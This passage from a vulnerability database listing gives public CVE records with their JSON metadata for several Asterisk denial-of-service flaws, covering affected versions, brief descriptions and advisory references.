        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2016-2232",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Asterisk Open Source 1.8.x, 11.x before 11.21.1, 12.x, and 13.x before 13.7.1 and Certified Asterisk 1.8.28, 11.6 before 11.6-cert12, and 13.1 before 13.1-cert3 allow remote authenticated users to cause a denial of service (uninitialized pointer dereference and crash) via a zero length error correcting redundancy packet for a UDPTL FAX packet that is lost."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2016-003.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2016-003.html"
            },
            {
              "name": "1034931",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1034931"
            },
            {
              "name": "DSA-3700",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2016/dsa-3700"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2016-2232",
    "datePublished": "2016-02-22T15:05:00",
    "dateReserved": "2016-02-07T00:00:00",
    "dateUpdated": "2024-08-05T23:24:48.950Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2016-2316

Vulnerability from cvelistv5

Published

2016-02-22 15:05

Modified

2024-08-05 23:24

Severity ?

Summary

chan_sip in Asterisk Open Source 1.8.x, 11.x before 11.21.1, 12.x, and 13.x before 13.7.1 and Certified Asterisk 1.8.28, 11.6 before 11.6-cert12, and 13.1 before 13.1-cert3, when the timert1 sip.conf configuration is set to a value greater than 1245, allows remote attackers to cause a denial of service (file descriptor consumption) via vectors related to large retransmit timeout values.

References

▼	URL	Tags
	http://www.securityfocus.com/bid/82651	vdb-entry, x_refsource_BID
	http://www.securitytracker.com/id/1034930	vdb-entry, x_refsource_SECTRACK
	http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177409.html	vendor-advisory, x_refsource_FEDORA
	http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177422.html	vendor-advisory, x_refsource_FEDORA
	http://www.debian.org/security/2016/dsa-3700	vendor-advisory, x_refsource_DEBIAN
	http://downloads.asterisk.org/pub/security/AST-2016-002.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T23:24:48.520Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "82651",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/82651"
          },
          {
            "name": "1034930",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1034930"
          },
          {
            "name": "FEDORA-2016-3cc13611f4",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177409.html"
          },
          {
            "name": "FEDORA-2016-153eed2bb8",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177422.html"
          },
          {
            "name": "DSA-3700",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2016/dsa-3700"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2016-002.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2016-02-03T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "chan_sip in Asterisk Open Source 1.8.x, 11.x before 11.21.1, 12.x, and 13.x before 13.7.1 and Certified Asterisk 1.8.28, 11.6 before 11.6-cert12, and 13.1 before 13.1-cert3, when the timert1 sip.conf configuration is set to a value greater than 1245, allows remote attackers to cause a denial of service (file descriptor consumption) via vectors related to large retransmit timeout values."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-11-03T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "82651",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/82651"
        },
        {
          "name": "1034930",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1034930"
        },
        {
          "name": "FEDORA-2016-3cc13611f4",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177409.html"
        },
        {
          "name": "FEDORA-2016-153eed2bb8",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177422.html"
        },
        {
          "name": "DSA-3700",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2016/dsa-3700"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2016-002.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2016-2316",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "chan_sip in Asterisk Open Source 1.8.x, 11.x before 11.21.1, 12.x, and 13.x before 13.7.1 and Certified Asterisk 1.8.28, 11.6 before 11.6-cert12, and 13.1 before 13.1-cert3, when the timert1 sip.conf configuration is set to a value greater than 1245, allows remote attackers to cause a denial of service (file descriptor consumption) via vectors related to large retransmit timeout values."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "82651",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/82651"
            },
            {
              "name": "1034930",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1034930"
            },
            {
              "name": "FEDORA-2016-3cc13611f4",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177409.html"
            },
            {
              "name": "FEDORA-2016-153eed2bb8",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177422.html"
            },
            {
              "name": "DSA-3700",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2016/dsa-3700"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2016-002.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2016-002.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2016-2316",
    "datePublished": "2016-02-22T15:05:00",
    "dateReserved": "2016-02-11T00:00:00",
    "dateUpdated": "2024-08-05T23:24:48.520Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-4055

Vulnerability from cvelistv5

Published

2009-12-02 11:00

Modified

2024-08-07 06:45

Severity ?

Summary

rtp.c in Asterisk Open Source 1.2.x before 1.2.37, 1.4.x before 1.4.27.1, 1.6.0.x before 1.6.0.19, and 1.6.1.x before 1.6.1.11; Business Edition B.x.x before B.2.5.13, C.2.x.x before C.2.4.6, and C.3.x.x before C.3.2.3; and s800i 1.3.x before 1.3.0.6 allows remote attackers to cause a denial of service (daemon crash) via an RTP comfort noise payload with a long data length.

References

▼	URL	Tags
	http://www.securityfocus.com/bid/37153	vdb-entry, x_refsource_BID
	http://www.securityfocus.com/archive/1/508147/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://secunia.com/advisories/37677	third-party-advisory, x_refsource_SECUNIA
	http://securitytracker.com/id?1023249	vdb-entry, x_refsource_SECTRACK
	http://www.debian.org/security/2009/dsa-1952	vendor-advisory, x_refsource_DEBIAN
	https://exchange.xforce.ibmcloud.com/vulnerabilities/54471	vdb-entry, x_refsource_XF
	http://downloads.asterisk.org/pub/security/AST-2009-010-1.4.diff.txt	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.0.diff.txt	x_refsource_CONFIRM
	http://secunia.com/advisories/37530	third-party-advisory, x_refsource_SECUNIA
	http://www.redhat.com/archives/fedora-package-announce/2009-December/msg00759.html	vendor-advisory, x_refsource_FEDORA
	https://issues.asterisk.org/view.php?id=16242	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.1.diff.txt	x_refsource_CONFIRM
	http://secunia.com/advisories/37708	third-party-advisory, x_refsource_SECUNIA
	http://www.osvdb.org/60569	vdb-entry, x_refsource_OSVDB
	http://downloads.digium.com/pub/security/AST-2009-010.html	x_refsource_CONFIRM
	http://www.vupen.com/english/advisories/2009/3368	vdb-entry, x_refsource_VUPEN
	http://downloads.asterisk.org/pub/security/AST-2009-010-1.2.diff.txt	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T06:45:51.226Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "37153",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/37153"
          },
          {
            "name": "20091130 AST-2009-010: RTP Remote Crash Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/508147/100/0/threaded"
          },
          {
            "name": "37677",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37677"
          },
          {
            "name": "1023249",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1023249"
          },
          {
            "name": "DSA-1952",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2009/dsa-1952"
          },
          {
            "name": "asterisk-rtp-comfortnoise-dos(54471)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54471"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.4.diff.txt"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.0.diff.txt"
          },
          {
            "name": "37530",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37530"
          },
          {
            "name": "FEDORA-2009-12461",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/archives/fedora-package-announce/2009-December/msg00759.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/view.php?id=16242"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.1.diff.txt"
          },
          {
            "name": "37708",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/37708"
          },
          {
            "name": "60569",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/60569"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2009-010.html"
          },
          {
            "name": "ADV-2009-3368",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2009/3368"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.2.diff.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2009-11-30T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "rtp.c in Asterisk Open Source 1.2.x before 1.2.37, 1.4.x before 1.4.27.1, 1.6.0.x before 1.6.0.19, and 1.6.1.x before 1.6.1.11; Business Edition B.x.x before B.2.5.13, C.2.x.x before C.2.4.6, and C.3.x.x before C.3.2.3; and s800i 1.3.x before 1.3.0.6 allows remote attackers to cause a denial of service (daemon crash) via an RTP comfort noise payload with a long data length."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-10T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "37153",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/37153"
        },
        {
          "name": "20091130 AST-2009-010: RTP Remote Crash Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/508147/100/0/threaded"
        },
        {
          "name": "37677",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37677"
        },
        {
          "name": "1023249",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1023249"
        },
        {
          "name": "DSA-1952",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2009/dsa-1952"
        },
        {
          "name": "asterisk-rtp-comfortnoise-dos(54471)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54471"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.4.diff.txt"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.0.diff.txt"
        },
        {
          "name": "37530",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37530"
        },
        {
          "name": "FEDORA-2009-12461",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://www.redhat.com/archives/fedora-package-announce/2009-December/msg00759.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/view.php?id=16242"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.1.diff.txt"
        },
        {
          "name": "37708",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/37708"
        },
        {
          "name": "60569",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://www.osvdb.org/60569"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2009-010.html"
        },
        {
          "name": "ADV-2009-3368",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2009/3368"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.2.diff.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2009-4055",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "rtp.c in Asterisk Open Source 1.2.x before 1.2.37, 1.4.x before 1.4.27.1, 1.6.0.x before 1.6.0.19, and 1.6.1.x before 1.6.1.11; Business Edition B.x.x before B.2.5.13, C.2.x.x before C.2.4.6, and C.3.x.x before C.3.2.3; and s800i 1.3.x before 1.3.0.6 allows remote attackers to cause a denial of service (daemon crash) via an RTP comfort noise payload with a long data length."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "37153",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/37153"
            },
            {
              "name": "20091130 AST-2009-010: RTP Remote Crash Vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/508147/100/0/threaded"
            },
            {
              "name": "37677",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/37677"
            },
            {
              "name": "1023249",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1023249"
            },
            {
              "name": "DSA-1952",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2009/dsa-1952"
            },
            {
              "name": "asterisk-rtp-comfortnoise-dos(54471)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/54471"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.4.diff.txt",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.4.diff.txt"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.0.diff.txt",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.0.diff.txt"
            },
            {
              "name": "37530",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/37530"
            },
            {
              "name": "FEDORA-2009-12461",
              "refsource": "FEDORA",
              "url": "http://www.redhat.com/archives/fedora-package-announce/2009-December/msg00759.html"
            },
            {
              "name": "https://issues.asterisk.org/view.php?id=16242",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/view.php?id=16242"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.1.diff.txt",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.6.1.diff.txt"
            },
            {
              "name": "37708",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/37708"
            },
            {
              "name": "60569",
              "refsource": "OSVDB",
              "url": "http://www.osvdb.org/60569"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2009-010.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2009-010.html"
            },
            {
              "name": "ADV-2009-3368",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2009/3368"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.2.diff.txt",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2009-010-1.2.diff.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2009-4055",
    "datePublished": "2009-12-02T11:00:00",
    "dateReserved": "2009-11-23T00:00:00",
    "dateUpdated": "2024-08-07T06:45:51.226Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2012-5976

Vulnerability from cvelistv5

Published

2013-01-04 11:00

Modified

2024-08-06 21:21

Severity ?

Summary

Multiple stack consumption vulnerabilities in Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones allow remote attackers to cause a denial of service (daemon crash) via TCP data using the (1) SIP, (2) HTTP, or (3) XMPP protocol.

References

▼	URL	Tags
	http://downloads.asterisk.org/pub/security/AST-2012-014	x_refsource_CONFIRM
	http://www.debian.org/security/2013/dsa-2605	vendor-advisory, x_refsource_DEBIAN

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T21:21:28.331Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2012-014"
          },
          {
            "name": "DSA-2605",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2013/dsa-2605"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2013-01-02T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple stack consumption vulnerabilities in Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones allow remote attackers to cause a denial of service (daemon crash) via TCP data using the (1) SIP, (2) HTTP, or (3) XMPP protocol."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-02-02T10:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2012-014"
        },
        {
          "name": "DSA-2605",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2013/dsa-2605"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-5976",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple stack consumption vulnerabilities in Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones allow remote attackers to cause a denial of service (daemon crash) via TCP data using the (1) SIP, (2) HTTP, or (3) XMPP protocol."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2012-014",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2012-014"
            },
            {
              "name": "DSA-2605",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2013/dsa-2605"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-5976",
    "datePublished": "2013-01-04T11:00:00",
    "dateReserved": "2012-11-21T00:00:00",
    "dateUpdated": "2024-08-06T21:21:28.331Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-7251

Vulnerability from cvelistv5

Published

2019-03-28 16:18

Modified

2024-08-04 20:46

Severity ?

Summary

An Integer Signedness issue (for a return code) in the res_pjsip_sdp_rtp module in Digium Asterisk versions 15.7.1 and earlier and 16.1.1 and earlier allows remote authenticated users to crash Asterisk via a specially crafted SDP protocol violation.

References

▼	URL	Tags
	https://issues.asterisk.org/jira/browse/ASTERISK-28260	x_refsource_CONFIRM
	https://downloads.asterisk.org/pub/security/AST-2019-001.html	x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T20:46:45.910Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28260"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://downloads.asterisk.org/pub/security/AST-2019-001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2019-01-24T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An Integer Signedness issue (for a return code) in the res_pjsip_sdp_rtp module in Digium Asterisk versions 15.7.1 and earlier and 16.1.1 and earlier allows remote authenticated users to crash Asterisk via a specially crafted SDP protocol violation."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-03-28T16:18:45",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-28260"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://downloads.asterisk.org/pub/security/AST-2019-001.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2019-7251",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An Integer Signedness issue (for a return code) in the res_pjsip_sdp_rtp module in Digium Asterisk versions 15.7.1 and earlier and 16.1.1 and earlier allows remote authenticated users to crash Asterisk via a specially crafted SDP protocol violation."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-28260",
              "refsource": "CONFIRM",
